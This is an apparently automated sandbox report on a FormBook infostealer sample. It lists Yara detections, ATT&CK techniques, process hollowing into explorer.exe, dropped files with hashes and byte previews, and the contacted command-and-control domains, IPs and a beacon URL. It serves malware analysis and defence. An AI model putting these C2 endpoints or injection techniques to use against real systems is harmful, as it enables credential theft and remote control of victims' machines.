          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.72878.10638.exeCode function: 0_2_00403646 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

          Stealing of Sensitive Information

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 1.2.fdvucso.exe.a70000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.fdvucso.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.fdvucso.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.fdvucso.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.fdvucso.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.fdvucso.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.fdvucso.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.fdvucso.exe.a70000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.fdvucso.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000001.00000002.440039728.0000000000A70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.436409540.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.693621783.0000000000550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.514455300.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.693742104.0000000000580000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.495589991.000000000B525000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.693389419.0000000000160000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.514680084.0000000001130000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.514627595.0000000000FF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.438220489.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.479898267.000000000B525000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

          Remote Access Functionality

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 1.2.fdvucso.exe.a70000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.fdvucso.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.fdvucso.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.fdvucso.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.fdvucso.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.fdvucso.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.fdvucso.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.fdvucso.exe.a70000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.fdvucso.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000001.00000002.440039728.0000000000A70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.436409540.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.693621783.0000000000550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.514455300.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.693742104.0000000000580000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.495589991.000000000B525000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.693389419.0000000000160000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.514680084.0000000001130000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.514627595.0000000000FF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.438220489.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.479898267.000000000B525000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts1
          Native API          		Path Interception1
          Access Token Manipulation          		1
          Rootkit          		1
          Credential API Hooking          		1
          System Time Discovery          		Remote Services1
          Credential API Hooking          		Exfiltration Over Other Network Medium1
          Encrypted Channel          		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
          System Shutdown/Reboot
          Default Accounts1
          Shared Modules          		Boot or Logon Initialization Scripts512
          Process Injection          		2
          Virtualization/Sandbox Evasion          		LSASS Memory151
          Security Software Discovery          		Remote Desktop Protocol1
          Archive Collected Data          		Exfiltration Over Bluetooth3
          Ingress Tool Transfer          		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)1
          Access Token Manipulation          		Security Account Manager2
          Virtualization/Sandbox Evasion          		SMB/Windows Admin Shares1
          Clipboard Data          		Automated Exfiltration3
          Non-Application Layer Protocol          		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)512
          Process Injection          		NTDS2
          Process Discovery          		Distributed Component Object ModelInput CaptureScheduled Transfer13
          Application Layer Protocol          		SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
          Deobfuscate/Decode Files or Information          		LSA Secrets1
          Remote System Discovery          		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.common3
          Obfuscated Files or Information          		Cached Domain Credentials2
          File and Directory Discovery          		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup Items1
          Software Packing          		DCSync114
          System Information Discovery          		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 626276 Sample: SecuriteInfo.com.Variant.Ja... Startdate: 13/05/2022 Architecture: WINDOWS Score: 100 47 Found malware configuration 2->47 49 Malicious sample detected (through community Yara rule) 2->49 51 Multi AV Scanner detection for submitted file 2->51 53 4 other signatures 2->53 11 SecuriteInfo.com.Variant.Jaik.72878.10638.exe 19 2->11         started        process3 file4 31 C:\Users\user\AppData\Local\...\fdvucso.exe, PE32 11->31 dropped 14 fdvucso.exe 11->14         started        process5 signatures6 63 Tries to detect virtualization through RDTSC time measurements 14->63 17 fdvucso.exe 14->17         started        process7 signatures8 39 Modifies the context of a thread in another process (thread injection) 17->39 41 Maps a DLL or memory area into another process 17->41 43 Sample uses process hollowing technique 17->43 45 Queues an APC in another process (thread injection) 17->45 20 explorer.exe 17->20 injected process9 dnsIp10 33 www.qzbozhijy.com 170.75.150.177, 49809, 80 QUICKPACKETUS United States 20->33 35 www.lume24.com 20->35 37 www.cryptocurrenciesmarketcaps.com 35.186.238.101, 49871, 80 GOOGLEUS United States 20->37 55 System process connects to network (likely due to code injection or exploit) 20->55 24 cmd.exe 20->24         started        signatures11 process12 signatures13 57 Modifies the context of a thread in another process (thread injection) 24->57 59 Maps a DLL or memory area into another process 24->59 61 Tries to detect virtualization through RDTSC time measurements 24->61 27 cmd.exe 1 24->27         started        process14 process15 29 conhost.exe 27->29         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          SecuriteInfo.com.Variant.Jaik.72878.10638.exe42%VirustotalBrowse
          SecuriteInfo.com.Variant.Jaik.72878.10638.exe44%ReversingLabsWin32.Trojan.FormBook
          SecuriteInfo.com.Variant.Jaik.72878.10638.exe100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          2.0.fdvucso.exe.400000.4.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          2.2.fdvucso.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          2.0.fdvucso.exe.400000.6.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          2.0.fdvucso.exe.400000.8.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          1.2.fdvucso.exe.a70000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          SourceDetectionScannerLabelLink
          www.lume24.com1%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          www.worklifefirewalls.com/m9y5/2%VirustotalBrowse
          www.worklifefirewalls.com/m9y5/0%Avira URL Cloudsafe
          http://www.qzbozhijy.com/m9y5/?GDHDO=orMzR/RfXnMhfSAyBjBjnR1lGR+TvkHzuwdFBkAhJBLh1eKTDfMMMN4zoKLE4Jh6elIQ&2d0tk4=7nxxAXLHM40%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.cryptocurrenciesmarketcaps.com
          		35.186.238.101
          		truefalse
            		unknown
            www.qzbozhijy.com
            		170.75.150.177
            		truetrue
              		unknown
              www.lume24.com
              		unknown
              		unknowntrueunknown

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              www.worklifefirewalls.com/m9y5/true
              • 2%, Virustotal, Browse
              • Avira URL Cloud: safe
              		low
              http://www.qzbozhijy.com/m9y5/?GDHDO=orMzR/RfXnMhfSAyBjBjnR1lGR+TvkHzuwdFBkAhJBLh1eKTDfMMMN4zoKLE4Jh6elIQ&2d0tk4=7nxxAXLHM4true
              • Avira URL Cloud: safe
              		unknown

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              https://zz.bdstatic.com/linksubmit/push.jscmd.exe, 0000000D.00000002.695248264.000000000384F000.00000004.10000000.00040000.00000000.sdmpfalse
                		high
                http://nsis.sf.net/NSIS_ErrorErrorSecuriteInfo.com.Variant.Jaik.72878.10638.exefalse
                  		high
                  http://push.zhanzhang.baidu.com/push.jscmd.exe, 0000000D.00000002.695248264.000000000384F000.00000004.10000000.00040000.00000000.sdmpfalse
                    		high

                    World Map of Contacted IPs

                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs

                    Public IPs

                    IPDomainCountryFlagASNASN NameMalicious
                    35.186.238.101
                    		www.cryptocurrenciesmarketcaps.comUnited States
                    		15169GOOGLEUSfalse
                    170.75.150.177
                    		www.qzbozhijy.comUnited States
                    		46261QUICKPACKETUStrue

                    General Information

                    Joe Sandbox Version:34.0.0 Boulder Opal
                    Analysis ID:626276
                    Start date and time: 13/05/202219:42:122022-05-13 19:42:12 +02:00
                    Joe Sandbox Product:CloudBasic
                    Overall analysis duration:0h 9m 56s
                    Hypervisor based Inspection enabled:false
                    Report type:light
                    Sample file name:SecuriteInfo.com.Variant.Jaik.72878.10638.10974 (renamed file extension from 10974 to exe)
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                    Number of analysed new started processes analysed:28
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:1
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • HDC enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Detection:MAL
                    Classification:mal100.troj.evad.winEXE@9/4@4/2
                    EGA Information:
                    • Successful, ratio: 100%
                    HDC Information:
                    • Successful, ratio: 89% (good quality ratio 83%)
                    • Quality average: 74.4%
                    • Quality standard deviation: 30.6%
                    HCA Information:
                    • Successful, ratio: 100%
                    • Number of executed functions: 0
                    • Number of non-executed functions: 0
                    Cookbook Comments:
                    • Adjust boot time
                    • Enable AMSI

                    Warnings

                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WerFault.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                    • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, client.wns.windows.com, fs.microsoft.com, store-images.s-microsoft.com, login.live.com, sls.update.microsoft.com, ctldl.windowsupdate.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
                    • Not all processes where analyzed, report is missing behavior information

                    Simulations

                    Behavior and APIs

                    No simulations

                    Joe Sandbox View / Context

                    IPs

                    No context

                    Domains

                    No context

                    ASNs

                    No context

                    JA3 Fingerprints

                    No context

                    Dropped Files

                    No context

                    Created / dropped Files

                    C:\Users\user\AppData\Local\Temp\fdvucso.exe

                    Download File
                    Process:C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.72878.10638.exe
                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                    Category:dropped
                    Size (bytes):80384
                    Entropy (8bit):6.294173225862387
                    Encrypted:false
                    SSDEEP:1536:jsTaC+v1CUfr0oxAomP3cX/4pi2sWjcdaXI:Ca5wUD1/ui5a4
                    MD5:8CA00DF697FFA200C6CA558754C49F37
                    SHA1:4A84F286472799A541BFEF17CFC9F746C7B692D3
                    SHA-256:3D9400A6D9CA60C3BBE4212BA2727924E086A41CD2634D5CE1C4B8D9EE02F9DD
                    SHA-512:1451AC47CF1FD29AF252E75657A99486165404CF891A43E3FB617DCE6C5168AF42D1B0E62EC34E463AE168AFCDF9763107629C1A4DA862760C21232F789538B3
                    Malicious:true
                    Reputation:low
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........w...w...w...%`..w...%^..w...%a.w......w...w..w..p....w..p.~..w..p....w..Rich.w..................PE..L...a.~b............................7.............@.......................................@..................................$.......p..................................T...............................@............................................text...U........................... ..`.rdata...N.......P..................@..@.data... 1...0......................@....rsrc........p.......*..............@..@.reloc...............,..............@..B................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Temp\kk2f9zwlwvo3ghi9f9

                    Download File
                    Process:C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.72878.10638.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):189439
                    Entropy (8bit):7.9917863154165305
                    Encrypted:true
                    SSDEEP:3072:UMe+HAL1YEIOIaeq6vQwmi25nAQquhWdC8cSiQmjgLzylj/YUhljifyucPqP:E9aVOIaeqlwmDKQqM8cSdvEgUH+fR+O
                    MD5:BE2AEB25761BA4A8F20FBD04EA588971
                    SHA1:95528D502D8DDB7A3ECF3524378876EC08FBD348
                    SHA-256:586F3F57F0BA77EE87F999E6AE034375A5BB07D9A6CC95AB9D185EECD933A963
                    SHA-512:8AAFDD4E154B8633D311DF4EF929DE4BD9B0F2147CA7582FE10359B8FC6048F4AE815C276589C8AC177C43F55F4015B2336C5CE6CB6FABAA08BE4B2BCA5C91D3
                    Malicious:false
                    Preview:]....)8.z.E....{T`Z2Kb.P.....$.Qd.23....)e....a...............W.g%........I..[h..5G.*.a=..(>.....{.....a....,..N.B.1.X.m..8..(}..........9....+.&.ol...x...x. .:.KHy.6..n4.bJOt.w s)...^..4........K.Vjx[.(.?.w.(...).U.....M..N,.c....AY.#.TkD.G.:TPc.K.y)8..x.....G..r2.h....U.!..1QdT23....)X..a....6.........@.$%...jqE.....@...G..W.@.... '"^.!$....V.:....|....X.m..8..7r.....I9p4......W.b.,o.<.y..W..........n4.bJOt.h.....^......R..2.K.Vjx[.(+?{.l%".Z.......M..7.c.d..A.G#.T2D.\.:Tfc.b...y)8.zx.....G...2......U...$.Qd.23....)e....a..............@.$%...jqE.....@...G..W.@.... '"^.!$....V.:....|....X.m..8..7r.....I9p4......W.b.,o.<.y..W..........n4.bJOt.w s)...^M.4..NR.....K.Vjx[.(+?{.l%"..Z.U.....M..7.c.d..A.G#.T2D.\.:Tfc.b...y)8.zx.....G...2......U...$.Qd.23....)e....a..............@.$%...jqE.....@...G..W.@.... '"^.!$....V.:....|....X.m..8..7r.....I9p4......W.b.,o.<.y..W..........n4.bJOt.w s)...^M.4..NR.....K.Vjx[.(+?{.l%"..Z.U.....M..

                    C:\Users\user\AppData\Local\Temp\nsmCEB5.tmp

                    Download File
                    Process:C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.72878.10638.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):281488
                    Entropy (8bit):7.6561639892830335
                    Encrypted:false
                    SSDEEP:6144:k9aVOIaeqlwmDKQqM8cSdvEgUH+fR+MwQd:IkOKqlDKxHcWMzGJw2
                    MD5:C5E6696957D25D8DEC8049B2F737C62D
                    SHA1:790E266C7FFAC4588626301B5090B6CA26B15020
                    SHA-256:8694698785F5AF0E04B78A6E36103B65A3A50D825B77C1848D4EC35C8A471E36
                    SHA-512:0744F7CEF46106D1CA98661B91928AC7C90494D65059EF062EA4A14AE419F2DFD97A84F2C9F6A49F81D1073B19326E849AE38500AA008D006CE34071C1453B6A
                    Malicious:false
                    Preview:........,...................A...............................................................................................................................................................................................................................................................G...................j...............................................................................................................................h...........!...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Temp\wqqynoeqp

                    Download File
                    Process:C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.72878.10638.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):4797
                    Entropy (8bit):6.202556793925154
                    Encrypted:false
                    SSDEEP:96:oV6T0r9Eo29FYSfUCvAy6gsaW6pAMIVcZ8B0Fs8+u:oV6T0mFYwUKAyBVa1VRWFiu
                    MD5:69750989332A51572B9E510D66ABBDCF
                    SHA1:D74C3B8C3280B05B816E89D09C2AE9274403002C
                    SHA-256:BB4AEE81C87AF317EF9CA3C2C3906B73E748391DEEDBDE1BEDDA841F8147EE44
                    SHA-512:9E9F1DA33F13F2DF7BC626E56D1138AEE3EC44EDFF73FC5E8D97206B8EAC576D76E621C1C7168D17A6292F61EF3A6624D69F3B2D054888B9A67FC4114E2E1CB8
                    Malicious:false
                    Preview:VA5==.Y.Y......M=<.}.<0.]<.}.<0.U...=....===..Q=..9..-....U.===..e..i..9..-....Uc===..m..q..9..-....Un===..u..y..9..-....U.===..}...J-A..5..}@@.9...]..a..-.UA.v..U..Y..U...A~.o.-.TN..U@..A.......Q.aM..U====.A!Bx.....e...m...u....}....]...U..S.-...9T....Q..[>.M..e...5<B..M@..U====..!A ===.A!:x..Q...M...v.9=.Y..<.}.<0...5.=..9....5.=..-.1~..~A......5.=...5.>.....v.9=.3.LU.?==U.?==.1=...lLU.?==U.?==.5=.:.LU.?==U.?==.5=.Y.Y.<.}.<0.U...-===..e....J.=.3...==.............XaU.B==.}....5..5..v=..:e..:i..U..5.~^=..:e..:i.?.5..}=..Be....lLUx>==.Uo....QX<..U...5U.....Q.JQ=.C..M=XD..M>===..Mv.A=.Y.Y.<.}.<0.U....===..}....J.=.3...==.............XaU.A==.}<..===..5..5..v=..:}..:...9..5.~^=..:}..:...-..5.n^..:}..:...1.v.5..o@..2}..2...U..5.~^?..:}..:..B.5..}=..B}..3.LU_===.UV....Q.J%=.5..U..%.>X4..%..1..-..9..5U.....Q.JQ=.C..M=XD..M>===..Mv.1=.Y.Y)...-===..a....J.=.3...==.............XaU.@==.}....5..5..v=..:a..:U..9..5.~^=..:a..:U.?.5..}=..Ba..:.LU"===.U.....QX;..9..5U...

                    Static File Info

                    General

                    File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                    Entropy (8bit):7.911203365939466
                    TrID:
                    • Win32 Executable (generic) a (10002005/4) 99.96%
                    • Generic Win/DOS Executable (2004/3) 0.02%
                    • DOS Executable Generic (2002/1) 0.02%
                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                    File name:SecuriteInfo.com.Variant.Jaik.72878.10638.exe
                    File size:277920
                    MD5:69250f55fbfe48822c838b4eeaf33a0a
                    SHA1:3e4e1dd9dbeb98ec354f7a03d455a0a38ccea4e5
                    SHA256:752d0155c769033832d6845eabba29bce2b9d0eedff734b31a49c879ed08ff72
                    SHA512:8bb1f40992a1e829d7b6ce9751dec84d849c50bdf72a1bcd8da9362c8cca0521729f9031fcf6f19438c147702eb601b31fcec9ea9e230e2a00b0ed9b679e6aa6
                    SSDEEP:6144:LOtIOb+kdk/PekMHsLKhnbdAnYlqQZvtBA6o3fX:LOLbhdkXekMMLAnbuYlL7BAP
                    TLSH:C444228077E5A273DA013A335EB76B764FEDD81262A1E703C3C03E593D3EA454A5E522
                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!`G.@...@...@../OQ..@...@..I@../OS..@...c>..@..+F...@..Rich.@..........................PE..L.....Oa.................h....:....

                    File Icon

                    Icon Hash:b2a88c96b2ca6a72

                    Static PE Info

                    General

                    Entrypoint:0x403646
                    Entrypoint Section:.text
                    Digitally signed:false
                    Imagebase:0x400000
                    Subsystem:windows gui
                    Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                    DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                    Time Stamp:0x614F9AA9 [Sat Sep 25 21:54:49 2021 UTC]
                    TLS Callbacks:
                    CLR (.Net) Version:
                    OS Version Major:4
                    OS Version Minor:0
                    File Version Major:4
                    File Version Minor:0
                    Subsystem Version Major:4
                    Subsystem Version Minor:0
                    Import Hash:61259b55b8912888e90f516ca08dc514

                    Entrypoint Preview

                    Instruction
                    push ebp
                    mov ebp, esp
                    sub esp, 000003F4h
                    push ebx
                    push esi
                    push edi
                    push 00000020h
                    pop edi
                    xor ebx, ebx
                    push 00008001h
                    mov dword ptr [ebp-14h], ebx
                    mov dword ptr [ebp-04h], 0040A230h
                    mov dword ptr [ebp-10h], ebx
                    call dword ptr [004080C8h]
                    mov esi, dword ptr [004080CCh]
                    lea eax, dword ptr [ebp-00000140h]
                    push eax
                    mov dword ptr [ebp-0000012Ch], ebx
                    mov dword ptr [ebp-2Ch], ebx
                    mov dword ptr [ebp-28h], ebx
                    mov dword ptr [ebp-00000140h], 0000011Ch
                    call esi
                    test eax, eax
                    jne 00007FAF089421CAh
                    lea eax, dword ptr [ebp-00000140h]
                    mov dword ptr [ebp-00000140h], 00000114h
                    push eax
                    call esi
                    mov ax, word ptr [ebp-0000012Ch]
                    mov ecx, dword ptr [ebp-00000112h]
                    sub ax, 00000053h
                    add ecx, FFFFFFD0h
                    neg ax
                    sbb eax, eax
                    mov byte ptr [ebp-26h], 00000004h
                    not eax
                    and eax, ecx
                    mov word ptr [ebp-2Ch], ax
                    cmp dword ptr [ebp-0000013Ch], 0Ah
                    jnc 00007FAF0894219Ah
                    and word ptr [ebp-00000132h], 0000h
                    mov eax, dword ptr [ebp-00000134h]
                    movzx ecx, byte ptr [ebp-00000138h]
                    mov dword ptr [007A8B58h], eax
                    xor eax, eax
                    mov ah, byte ptr [ebp-0000013Ch]
                    movzx eax, ax
                    or eax, ecx
                    xor ecx, ecx
                    mov ch, byte ptr [ebp-2Ch]
                    movzx ecx, cx
                    shl eax, 10h
                    or eax, ecx

                    Rich Headers

                    Programming Language:
                    • [EXP] VC++ 6.0 SP5 build 8804

                    Data Directories

                    NameVirtual AddressVirtual Size Is in Section
                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_IMPORT0x85040xa0.rdata
                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x3b90000xa50.rsrc
                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b0.rdata
                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                    Sections

                    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                    .text0x10000x67c40x6800False0.675180288462data6.49518266675IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                    .rdata0x80000x139a0x1400False0.4498046875data5.14106681717IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                    .data0xa0000x39ebb80x600unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                    .ndata0x3a90000x100000x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                    .rsrc0x3b90000xa500xc00False0.401692708333data4.18753619353IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                    Resources

                    NameRVASizeTypeLanguageCountry
                    RT_ICON0x3b91900x2e8dataEnglishUnited States
                    RT_DIALOG0x3b94780x100dataEnglishUnited States
                    RT_DIALOG0x3b95780x11cdataEnglishUnited States
                    RT_DIALOG0x3b96980x60dataEnglishUnited States
                    RT_GROUP_ICON0x3b96f80x14dataEnglishUnited States
                    RT_MANIFEST0x3b97100x33eXML 1.0 document, ASCII text, with very long lines, with no line terminatorsEnglishUnited States

                    Imports

                    DLLImport
                    ADVAPI32.dllRegCreateKeyExW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, SetFileSecurityW, RegOpenKeyExW, RegEnumValueW
                    SHELL32.dllSHGetSpecialFolderLocation, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, ShellExecuteExW, SHGetFileInfoW
                    ole32.dllOleInitialize, OleUninitialize, CoCreateInstance, IIDFromString, CoTaskMemFree
                    COMCTL32.dllImageList_Create, ImageList_Destroy, ImageList_AddMasked
                    USER32.dllGetClientRect, EndPaint, DrawTextW, IsWindowEnabled, DispatchMessageW, wsprintfA, CharNextA, CharPrevW, MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, GetSystemMetrics, FillRect, AppendMenuW, TrackPopupMenu, OpenClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, PeekMessageW, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, EmptyClipboard, CreatePopupMenu
